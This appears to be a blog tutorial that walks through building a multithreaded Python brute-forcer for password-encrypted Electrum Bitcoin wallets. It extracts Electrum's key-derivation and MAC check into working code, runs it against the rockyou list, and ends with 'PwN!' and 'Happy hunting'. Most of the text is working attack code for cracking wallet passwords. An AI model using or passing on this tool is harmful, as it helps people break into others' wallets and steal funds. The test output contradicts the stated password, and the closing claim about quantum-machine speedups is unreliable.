Opening encrypted Electrum wallets using brute force
WSWOLF
We will conduct a small study of Electrum Bitcoin Wallet (hereinafter EBW), namely:
My favorite part, let's code: we will parse the EBW source code;
We will write a multi-threaded brute-forcer for opening Electrum wallets in Python 3;
And, of course, we will test the whole thing.
If this topic sounds interesting to you, let's get started. Make your favorite coffee and let's go...
PS: I will be using Ubuntu 16.04, Python 3.7.1 and Notepad++ to develop our brute-forcer.
1. Project creation
First, download the Electrum-4.x.x.tar.gz Python source (https://electrum.org/panel-download.html) and unpack it (I will use version 4.1.2):
cd ~/Downloads && tar -xf Electrum-4.1.2.tar.gz && cd Electrum-4.1.2 && ls -w1
and now we have
AUTHORS
contrib
electrum
electrum.desktop
Electrum.egg-info
LICENCE
MANIFEST.in
packages
PKG-INFO
README.rst
RELEASE-NOTES
run_electrum
setup.cfg
setup.py
For the project we only need the contents of the "electrum" directory. It contains all the Python code we will use to build our brute-forcer.
Let's create a working directory:
mkdir ~/EBW_bf
mkdir ~/EBW_bf/src
cp -r ~/Downloads/Electrum-4.1.2/electrum ~/EBW_bf/
cd ~/EBW_bf
We will work in a Python virtual environment, so in the project directory we do the following:
python3 -m venv ./venv && source ./venv/bin/activate
PS: I run Python modules via -m because it makes it obvious which Python version I am using.
Everything is ready, so we can start writing code, or rather copy-pasting from the Electrum sources. First, let's get acquainted with the wallet decryption process itself, which I have sketched as a diagram:

2. Coding
Let's start with main.py.
Here we need the WalletStorage class, which holds the decryption methods for our wallet. I will leave out the methods we do not need, because we only care about password verification. To understand how wallet initialization is organized in Electrum, let's turn to electrum/storage.py, specifically the WalletStorage class. When verifying a password (key), Electrum instantiates WalletStorage and calls its check_password() method, which in turn calls decrypt(). Hmm... not very clear, it seems to me. Let's write this chain in pseudocode for clarity:
init class WalletStorage('path_to_wallet') --> check_password(password) --> decrypt(password)
I ended up with this starting point:
import hashlib
import sys
import os

from src import ecc


class WalletStorage(object):

    def __init__(self, path):
        self.path = os.path.join(os.path.dirname(os.path.realpath(__file__)), path)
        self._file_exists = bool(self.path and os.path.exists(self.path))
        self.pubkey = None
        self.decrypted = ''
        with open(self.path, "r", encoding='utf-8') as f:
            self.raw = f.read()

    def _get_encryption_magic(self):
        # only password-encrypted wallets are handled here
        return b'BIE1'

    def decrypt(self, password) -> None:
        ec_key = self.get_eckey_from_password(password)
        s = False
        if self.raw:
            enc_magic = self._get_encryption_magic()
            s = ec_key.decrypt_message(self.raw, enc_magic)
        if s:
            print('[+] %s' % password)

    def check_password(self, password) -> None:
        self.decrypt(password)

    @staticmethod
    def get_eckey_from_password(password):
        # PBKDF2-HMAC-SHA512 with an empty salt and 1024 iterations
        secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
        ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)
        return ec_key


def main():
    # get wallet name from args
    wallet_name = None
    if len(sys.argv) != 2:
        print('Usage: %s <wallet_name>' % sys.argv[0])
        sys.exit()
    else:
        wallet_name = sys.argv[1]
    if not os.path.exists(wallet_name):
        print('Wallet not found in current directory.')
        sys.exit()
    # init wallet
    wallet = WalletStorage(wallet_name)
    for password in ['test1', 'passwordTest2']:
        wallet.check_password(password)


if __name__ == "__main__":
    main()
The decrypt method relies on the following methods:
get_eckey_from_password - derives the EC key from the secret. It returns an object of the ECPrivkey class, which we will come back to later.
_get_encryption_magic - returns the encryption type (password, key, etc.). You may notice that I have shortened this method to return b'BIE1', since I will only be looking at password encryption. BIE1 is the first 4 bytes of the base64-decoded wallet file, and they identify the encryption type (base64-decode the file yourself if you don't trust me).
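To see the magic bytes for yourself, here is a minimal sketch. It does not touch a real wallet: fake_wallet is a synthetic stand-in with the same layout that decrypt_message expects (magic, 33-byte ephemeral public key, ciphertext, 32-byte MAC), and read_magic is a hypothetical helper name, not part of Electrum.

```python
import base64

# Synthetic stand-in for an encrypted wallet file (assumption, not real data):
# 4-byte magic + 33-byte ephemeral pubkey + 16 bytes ciphertext + 32-byte MAC.
fake_wallet = base64.b64encode(b'BIE1' + bytes(33) + bytes(16) + bytes(32))


def read_magic(raw: bytes) -> bytes:
    """Return the first 4 bytes of the base64-decoded wallet contents."""
    return base64.b64decode(raw)[:4]


print(fake_wallet[:6])          # the base64 text that encodes the magic
print(read_magic(fake_wallet))  # b'BIE1'
```

For a real file you would pass the file contents to read_magic instead of fake_wallet.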
The next step is to look at the methods of the ECPrivkey class, specifically decrypt_message, which gives us the desired YES or NO when checking a password. Let's go in order: the first call chain is decrypt(password) -> get_eckey_from_password(password), which in turn calls ecc.ECPrivkey.from_arbitrary_size_secret(secret).
Let's create an ecc.py file in the src working directory; it will contain the ECPrivkey class.
PS: I follow the same naming conventions as the Electrum project so that there is no confusion.
The layout should look like this:
electrum
venv
main.py
src
├── ecc.py
└── __init__.py
In __init__.py, let's register our ecc.py:
__init__.py
from . import ecc
Let's start building ecc.py: at this stage we need the ECPubkey and ECPrivkey classes with the set of methods necessary for our purposes.
First of all, we call the class method ECPrivkey.from_arbitrary_size_secret(secret). To see what happens there, refer to electrum/ecc.py.
Again, everything is confusing... let's write it in a readable form:
from_arbitrary_size_secret() --> init class ECPrivkey --> init class ECPubkey
I.e. the class method from_arbitrary_size_secret instantiates ECPrivkey, which in turn, during its own initialization, multiplies GENERATOR (an ECPubkey instance) by the secret and initializes its ECPubkey base class with the result.
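Before the full listing, the first two links of this chain can be sketched with the standard library alone. This is a simplified illustration of what get_eckey_from_password and normalize_secret_bytes do together, not Electrum's actual code; password_to_scalar_bytes is a name I made up for the example.

```python
import hashlib

# Order of the secp256k1 group, as used in ecc.py
CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141


def password_to_scalar_bytes(password: str) -> bytes:
    """Stretch the password with PBKDF2, then reduce it to a 32-byte scalar."""
    # 64-byte secret: PBKDF2-HMAC-SHA512, empty salt, 1024 iterations
    secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
    # Reduce modulo the curve order so the value is a valid private scalar
    scalar = int.from_bytes(secret, byteorder='big') % CURVE_ORDER
    if scalar == 0:
        raise ValueError('invalid EC private key scalar: zero')
    return scalar.to_bytes(32, byteorder='big')


key_bytes = password_to_scalar_bytes('password123')
print(len(key_bytes))  # 32
```

The 32 bytes returned here are what the ECPrivkey constructor receives as privkey_bytes.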
Let's arrange everything:
ecc.py
from typing import Union, Tuple, Optional
from ctypes import (
    byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
    CFUNCTYPE, POINTER, cast
)
import base64
import hashlib

from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot


class InvalidECPointException(Exception):
    """e.g. not on curve, or infinity (raised below, so it must be defined)"""


def string_to_number(b: bytes) -> int:
    return int.from_bytes(b, byteorder='big', signed=False)


def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
    if isinstance(secret, bytes):
        secret = string_to_number(secret)
    return 0 < secret < CURVE_ORDER


def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
    assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
    pubkey_ptr = create_string_buffer(64)
    ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
        _libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
    if not ret:
        raise InvalidECPointException('public key could not be parsed or is invalid')
    pubkey_serialized = create_string_buffer(65)
    pubkey_size = c_size_t(65)
    _libsecp256k1.secp256k1_ec_pubkey_serialize(
        _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
    pubkey_serialized = bytes(pubkey_serialized)
    assert pubkey_serialized[0] == 0x04, pubkey_serialized
    x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
    y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
    return x, y


class ECPubkey(object):

    def __init__(self, b: Optional[bytes]):
        if b is not None:
            assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
            if isinstance(b, bytearray):
                b = bytes(b)
            self._x, self._y = _x_and_y_from_pubkey_bytes(b)
        else:
            self._x, self._y = None, None

    def is_at_infinity(self):
        return self == POINT_AT_INFINITY

    def x(self) -> int:
        return self._x

    def y(self) -> int:
        return self._y

    def get_public_key_bytes(self, compressed=True):
        if self.is_at_infinity(): raise Exception('point is at infinity')
        x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
        y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
        if compressed:
            header = b'\x03' if self.y() & 1 else b'\x02'
            return header + x
        else:
            header = b'\x04'
            return header + x + y

    def _to_libsecp256k1_pubkey_ptr(self):
        pubkey = create_string_buffer(64)
        public_pair_bytes = self.get_public_key_bytes(compressed=False)
        ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
            _libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
        if not ret:
            raise Exception('public key could not be parsed or is invalid')
        return pubkey

    @classmethod
    def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
        pubkey_serialized = create_string_buffer(65)
        pubkey_size = c_size_t(65)
        _libsecp256k1.secp256k1_ec_pubkey_serialize(
            _libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
        return ECPubkey(bytes(pubkey_serialized))

    def __mul__(self, other: int):
        if not isinstance(other, int):
            raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))
        other %= CURVE_ORDER
        if self.is_at_infinity() or other == 0:
            return POINT_AT_INFINITY
        pubkey = self._to_libsecp256k1_pubkey_ptr()
        ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
        if not ret:
            return POINT_AT_INFINITY
        return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)


CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
                                   '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)


class ECPrivkey(ECPubkey):

    def __init__(self, privkey_bytes: bytes):
        assert_bytes(privkey_bytes)
        if len(privkey_bytes) != 32:
            raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
        secret = string_to_number(privkey_bytes)
        if not is_secret_within_curve_range(secret):
            raise InvalidECPointException('Invalid secret scalar (not within curve order)')
        self.secret_scalar = secret
        pubkey = GENERATOR * secret
        super().__init__(pubkey.get_public_key_bytes(compressed=False))

    @classmethod
    def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
        return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))

    @classmethod
    def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
        scalar = string_to_number(privkey_bytes) % CURVE_ORDER
        if scalar == 0:
            raise Exception('invalid EC private key scalar: zero')
        privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
        return privkey_32bytes

    def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bool:
        # returns True if the MAC matches (password is correct), False otherwise
        encrypted = base64.b64decode(encrypted)
        if len(encrypted) < 85:
            return False
        magic_found = encrypted[:4]
        ephemeral_pubkey_bytes = encrypted[4:37]
        ciphertext = encrypted[37:-32]
        mac = encrypted[-32:]
        if magic_found != magic:
            return False
        try:
            ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
        except InvalidECPointException as e:
            return False
        ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
        key = hashlib.sha512(ecdh_key).digest()
        iv, key_e, key_m = key[0:16], key[16:32], key[32:]
        if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
            return False
        else:
            return True
Here we refer to:
assert_bytes() from electrum/util.py
_libsecp256k1, SECP256K1_EC_UNCOMPRESSED from electrum/ecc_fast.py (a wrapper around the C library for ECDSA signatures and private/public key operations on the secp256k1 curve)
hmac_oneshot() from electrum/crypto.py
Let's borrow them from the corresponding electrum/*.py files:
create util.py, ecc_fast.py and crypto.py in the src directory.
And now our __init__.py will look like this:
__init__.py
from . import ecc
from . import util
from . import ecc_fast
from . import crypto
I have done the sifting for you and kept only what we need from the heap of unnecessary code:
ecc_fast.py
import os
import sys
import ctypes
from ctypes import (
    byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
    CFUNCTYPE, POINTER, cast
)

SECP256K1_FLAGS_TYPE_MASK = ((1 << 8) - 1)
SECP256K1_FLAGS_TYPE_CONTEXT = (1 << 0)
SECP256K1_FLAGS_TYPE_COMPRESSION = (1 << 1)
# /** The higher bits contain the actual data. Do not use directly. */
SECP256K1_FLAGS_BIT_CONTEXT_VERIFY = (1 << 8)
SECP256K1_FLAGS_BIT_CONTEXT_SIGN = (1 << 9)
SECP256K1_FLAGS_BIT_COMPRESSION = (1 << 8)

# /** Flags to pass to secp256k1_context_create. */
SECP256K1_CONTEXT_VERIFY = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_VERIFY)
SECP256K1_CONTEXT_SIGN = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_SIGN)
SECP256K1_CONTEXT_NONE = (SECP256K1_FLAGS_TYPE_CONTEXT)

SECP256K1_EC_COMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION | SECP256K1_FLAGS_BIT_COMPRESSION)
SECP256K1_EC_UNCOMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION)


class LibModuleMissing(Exception): pass


def load_library():
    # adjust this path to wherever libsecp256k1 lives on your system
    library_paths = ['/usr/lib/libsecp256k1.so.0']
    exceptions = []
    secp256k1 = None
    for libpath in library_paths:
        try:
            secp256k1 = ctypes.cdll.LoadLibrary(libpath)
        except BaseException as e:
            exceptions.append(e)
        else:
            break
    if not secp256k1:
        print(f'libsecp256k1 library failed to load. exceptions: {repr(exceptions)}')
        return None

    try:
        secp256k1.secp256k1_context_create.argtypes = [c_uint]
        secp256k1.secp256k1_context_create.restype = c_void_p

        secp256k1.secp256k1_context_randomize.argtypes = [c_void_p, c_char_p]
        secp256k1.secp256k1_context_randomize.restype = c_int

        secp256k1.secp256k1_ec_pubkey_create.argtypes = [c_void_p, c_void_p, c_char_p]
        secp256k1.secp256k1_ec_pubkey_create.restype = c_int

        secp256k1.secp256k1_ecdsa_sign.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p, c_void_p, c_void_p]
        secp256k1.secp256k1_ecdsa_sign.restype = c_int

        secp256k1.secp256k1_ecdsa_verify.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_verify.restype = c_int

        secp256k1.secp256k1_ec_pubkey_parse.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
        secp256k1.secp256k1_ec_pubkey_parse.restype = c_int

        secp256k1.secp256k1_ec_pubkey_serialize.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p, c_uint]
        secp256k1.secp256k1_ec_pubkey_serialize.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_parse_compact.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_normalize.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_normalize.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_serialize_compact.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_serialize_compact.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_parse_der.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
        secp256k1.secp256k1_ecdsa_signature_parse_der.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_serialize_der.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_serialize_der.restype = c_int

        secp256k1.secp256k1_ec_pubkey_tweak_mul.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ec_pubkey_tweak_mul.restype = c_int

        secp256k1.secp256k1_ec_pubkey_combine.argtypes = [c_void_p, c_char_p, c_void_p, c_size_t]
        secp256k1.secp256k1_ec_pubkey_combine.restype = c_int

        # --enable-module-recovery
        try:
            secp256k1.secp256k1_ecdsa_recover.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
            secp256k1.secp256k1_ecdsa_recover.restype = c_int

            secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p, c_int]
            secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.restype = c_int
        except (OSError, AttributeError):
            raise LibModuleMissing('libsecp256k1 library found but it was built '
                                   'without required module (--enable-module-recovery)')

        secp256k1.ctx = secp256k1.secp256k1_context_create(SECP256K1_CONTEXT_SIGN | SECP256K1_CONTEXT_VERIFY)
        ret = secp256k1.secp256k1_context_randomize(secp256k1.ctx, os.urandom(32))
        if not ret:
            print('secp256k1_context_randomize failed')
            return None

        return secp256k1
    except (OSError, AttributeError) as e:
        print(f'libsecp256k1 library was found and loaded but there was an error when using it: {repr(e)}')
        return None


_libsecp256k1 = None
try:
    _libsecp256k1 = load_library()
except BaseException as e:
    print(f'failed to load libsecp256k1: {repr(e)}')

if _libsecp256k1 is None:
    # hard fail:
    sys.exit(f"Error: Failed to load libsecp256k1.")
Make sure to change the path to libsecp256k1! It is given as a list in the load_library() function.
Since I am writing this brute-forcer under Ubuntu, I kept only a single path for locating libsecp256k1:
library_paths = ['/usr/lib/x86_64-linux-gnu/libsecp256k1.so.0']
PS: To find libsecp256k1.so.0 on your system, use the find utility:
find /usr/ -iname "libsecp256k1.so.0"
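If you would rather not hard-code the path, Python's standard ctypes.util.find_library can ask the system linker for it. The sketch below is my own suggestion and is not what Electrum or the listing above does; candidate_library_paths is a hypothetical helper, and find_library returns None when the library is not installed.

```python
import ctypes.util


def candidate_library_paths(extra=()):
    """Build a list of names/paths to try with ctypes.cdll.LoadLibrary."""
    paths = list(extra)
    # find_library returns something like 'libsecp256k1.so.0', or None
    found = ctypes.util.find_library('secp256k1')
    if found and found not in paths:
        paths.append(found)
    return paths


print(candidate_library_paths(['/usr/lib/x86_64-linux-gnu/libsecp256k1.so.0']))
```

The resulting list could be assigned to library_paths in load_library(), with the explicit path tried first.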
util.py
def assert_bytes(*args):
    """
    porting helper, assert args type
    """
    try:
        for x in args:
            assert isinstance(x, (bytes, bytearray))
    except:
        print('assert bytes failed', list(map(type, args)))
        raise
crypto.py
import hmac

from src.util import assert_bytes


def hmac_oneshot(key: bytes, msg: bytes, digest) -> bytes:
    if hasattr(hmac, 'digest'):
        # requires python 3.7+; faster
        return hmac.digest(key, msg, digest)
    else:
        return hmac.new(key, msg, digest).digest()
Done! What remains is to make sense of the still somewhat murky ecc.py.
The public key is created by
pubkey = GENERATOR * secret
The GENERATOR variable is ECPubkey(bytes.fromhex('...')), i.e. an instance of the ECPubkey class. Multiplying an ECPubkey by an int works because the ECPubkey class defines the __mul__ (multiplication) method.
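If operator overloading is new to you, here is a toy illustration of the same mechanism. ToyPoint and MODULUS are invented for this example and have nothing to do with real elliptic-curve arithmetic; the only point is that Python turns `G * 20` into `G.__mul__(20)`.

```python
MODULUS = 97  # arbitrary small modulus, for illustration only


class ToyPoint:
    """A stand-in 'point' whose scalar multiplication is plain modular arithmetic."""

    def __init__(self, value: int):
        self.value = value % MODULUS

    def __mul__(self, other: int) -> 'ToyPoint':
        # Same guard as ECPubkey.__mul__: only ints are accepted
        if not isinstance(other, int):
            raise TypeError('multiplication not defined for ToyPoint and {}'.format(type(other)))
        return ToyPoint(self.value * other)


G = ToyPoint(5)
P = G * 20       # Python calls G.__mul__(20)
print(P.value)   # 3, because 100 % 97 == 3
```

Note that the order matters: `20 * G` would raise a TypeError here, because only __mul__ is defined and not __rmul__. The ecc.py listing above is written the same way, which is why it always has the point on the left.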
Now let's take a look at the long-awaited decrypt_message() method, which is called from main.py and should return the result to us. Note that by this point we have already initialized the ECPubkey and ECPrivkey classes (keep that in mind).
def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bool:
    encrypted = base64.b64decode(encrypted)
    if len(encrypted) < 85:
        return False
    magic_found = encrypted[:4]
    ephemeral_pubkey_bytes = encrypted[4:37]
    ciphertext = encrypted[37:-32]
    mac = encrypted[-32:]
    if magic_found != magic:
        return False
    try:
        ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
    except:
        return False
    ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
    key = hashlib.sha512(ecdh_key).digest()
    iv, key_e, key_m = key[0:16], key[16:32], key[32:]
    # here we keep only the check itself: return False if the password
    # does not match, and return True otherwise.
    if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
        return False
    else:
        return True
Here we see how the wallet blob is sliced into pieces (magic, ephemeral public key, ciphertext and MAC), followed by the key calculations based on ephemeral_pubkey (a temporary public key). Finally, if mac is not equal to hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256), the password is wrong and we move on to the next one. We are almost at the finish line: it remains to wrap the whole thing in multithreading and test it.
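The slicing and the MAC comparison can be tried in isolation, without libsecp256k1. In the sketch below everything is synthetic: right_key and wrong_key are made-up 33-byte values standing in for the ECDH result, split_blob and mac_matches are hypothetical helper names, and I use hmac.compare_digest instead of the `!=` from the listing (a constant-time comparison, which is my substitution, not the original code).

```python
import hashlib
import hmac


def split_blob(encrypted: bytes):
    """Slice a decoded blob the same way decrypt_message does."""
    return encrypted[:4], encrypted[4:37], encrypted[37:-32], encrypted[-32:]


def mac_matches(ecdh_key: bytes, encrypted: bytes) -> bool:
    """Derive key_m from the shared secret and check the trailing 32-byte MAC."""
    key = hashlib.sha512(ecdh_key).digest()
    key_m = key[32:]  # bytes 0-15 are the IV, 16-31 the AES key, 32-63 the MAC key
    expected = hmac.new(key_m, encrypted[:-32], hashlib.sha256).digest()
    return hmac.compare_digest(expected, encrypted[-32:])


# Build a synthetic blob whose MAC was produced with right_key (assumed values)
right_key = b'\x02' + bytes(32)
wrong_key = b'\x03' + bytes(32)
body = b'BIE1' + bytes(33) + bytes(16)
key_m = hashlib.sha512(right_key).digest()[32:]
blob = body + hmac.new(key_m, body, hashlib.sha256).digest()

magic, eph, ciphertext, mac = split_blob(blob)
print(magic, len(eph), len(ciphertext), len(mac))  # b'BIE1' 33 16 32
print(mac_matches(right_key, blob))                # True
print(mac_matches(wrong_key, blob))                # False
```

This also shows where the minimum length of 85 comes from: 4 + 33 + 16 + 32 bytes.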
For multithreading we will use ThreadPoolExecutor (use whatever you prefer, I'm just used to working with it). To avoid eating up memory, we will read the password file line by line and process it in batches of 1000 instead of loading everything into memory.
Here's what I suggest:
que = []
with open(file_with_password, 'r', errors='replace') as fd:
    for password in fd:
        password = password.rstrip()
        que.append(password)
        if len(que) == 1000:
            with ThreadPoolExecutor(max_workers=4) as pool:
                pool.map(worker, que)
            que = []
if len(que) > 0:
    with ThreadPoolExecutor(max_workers=4) as pool:
        pool.map(worker, que)
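The same batching idea can be written a little more compactly with itertools.islice. This is an alternative sketch rather than the code used in the rest of the article: batches and run_in_batches are names I made up, and unlike the snippet above it reuses one pool for all batches and collects the workers' return values.

```python
from concurrent.futures import ThreadPoolExecutor
from itertools import islice


def batches(iterable, size):
    """Yield lists of at most `size` items without loading everything at once."""
    it = iter(iterable)
    while True:
        batch = list(islice(it, size))
        if not batch:
            return
        yield batch


def run_in_batches(worker, items, size=1000, max_workers=4):
    """Apply worker to every item, one batch at a time, keeping input order."""
    results = []
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        for batch in batches(items, size):
            # consuming pool.map also re-raises any exception from a worker
            results.extend(pool.map(worker, batch))
    return results


print(run_in_batches(len, ['a', 'bb', 'ccc', 'dddd', 'eeeee'], size=2))
# [1, 2, 3, 4, 5]
```

Since a file object is itself an iterator over lines, it can be passed as `items` directly.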
Let's add a progress bar by installing the convenient tqdm package:
python3 -m pip install tqdm
Note that before we start brute-forcing, we have to count the total number of passwords in the dictionary in order to display progress.
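Counting lines in a large dictionary takes a moment. One possible way to do it, sketched here under the assumption that lines end in '\n', is to read the file in binary chunks and count newline bytes; count_lines is a hypothetical helper and the temporary file only exists to make the example self-contained.

```python
import os
import tempfile


def count_lines(path: str, chunk_size: int = 1 << 20) -> int:
    """Count lines by counting b'\\n' in fixed-size binary chunks."""
    count = 0
    last = b'\n'
    with open(path, 'rb') as fd:
        while True:
            chunk = fd.read(chunk_size)
            if not chunk:
                break
            count += chunk.count(b'\n')
            last = chunk[-1:]
    # a final line without a trailing newline still counts as a line
    if last != b'\n':
        count += 1
    return count


# Demo on a throwaway three-line file
with tempfile.NamedTemporaryFile('wb', delete=False) as tmp:
    tmp.write(b'123456\npassword\nqwerty')
print(count_lines(tmp.name))  # 3
os.remove(tmp.name)
```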
As a result, we get something like this:
main.py
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
import hashlib
import sys
import os

from src import ecc


class WalletStorage(object):

    def __init__(self, path):
        self.path = os.path.join(os.path.dirname(os.path.realpath(__file__)), path)
        self._file_exists = bool(self.path and os.path.exists(self.path))
        self.pubkey = None
        self.decrypted = ''
        with open(self.path, "r", encoding='utf-8') as f:
            self.raw = f.read()

    def _get_encryption_magic(self):
        return b'BIE1'

    def decrypt(self, password) -> None:
        ec_key = self.get_eckey_from_password(password)
        s = False
        if self.raw:
            enc_magic = self._get_encryption_magic()
            s = ec_key.decrypt_message(self.raw, enc_magic)
        if s:
            print()
            print('[+] %s' % password)
            sys.stdout.flush()
            # exit() inside a pool thread is swallowed by the executor,
            # so terminate the whole process explicitly
            os._exit(0)

    def check_password(self, password) -> None:
        global PBAR
        self.decrypt(password)
        PBAR.update(1)

    @staticmethod
    def get_eckey_from_password(password):
        secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
        ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)
        return ec_key


def main():
    global PBAR
    # get wallet name from args
    wallet_name = None
    if len(sys.argv) != 2:
        print('Usage: %s <wallet_name>' % sys.argv[0])
        sys.exit()
    else:
        wallet_name = sys.argv[1]
    if not os.path.exists(wallet_name):
        print('Wallet not found in current directory.')
        sys.exit()
    # init wallet
    wallet = WalletStorage(wallet_name)

    # first pass: count the passwords so tqdm knows the total
    print('loading dict ...')
    dict_len = 0
    with open('rockyou.txt', 'r', errors='replace') as fd:
        for line in fd:
            dict_len += 1
    print('starting...')
    print()
    PBAR = tqdm(total=dict_len)

    # second pass: check the passwords in batches of 1000
    que = []
    with open('rockyou.txt', 'r', errors='replace') as fd:
        for password in fd:
            password = password.rstrip()
            que.append(password)
            if len(que) == 1000:
                with ThreadPoolExecutor(max_workers=4) as pool:
                    pool.map(wallet.check_password, que)
                que = []
    if len(que) > 0:
        with ThreadPoolExecutor(max_workers=4) as pool:
            pool.map(wallet.check_password, que)


if __name__ == "__main__":
    main()
and this directory layout:
venv
electrum
rockyou.txt
main.py
src
├── crypto.py
├── ecc_fast.py
├── ecc.py
├── __init__.py
└── util.py
3. Testing!
We will use the well-known rockyou list as a dictionary.
Let's create a wallet with a simple password (mine is password123), copy it to the working directory and start testing.
PS: for testing, set a password that is present in the dictionary. Our task is to make sure that the script works correctly; after that, do whatever your heart desires.
cp ~/.electrum/wallets/test_wallet ~/EBW_bf
python3 main.py test_wallet
The PC gets noisy, and we just wait :)
loading dict ...
starting...

 38%|█████████▉ | 5491654/14344324 [6489.81it/s]
[+] testpassword123
PwN! The result was not long in coming. I hope you picked up something useful from this article and will put the knowledge to use in the future (for good purposes, of course). Happy hunting, everyone!
If you have access to Azure Quantum, the speed on those machines is reportedly 500-1000 times faster than usual.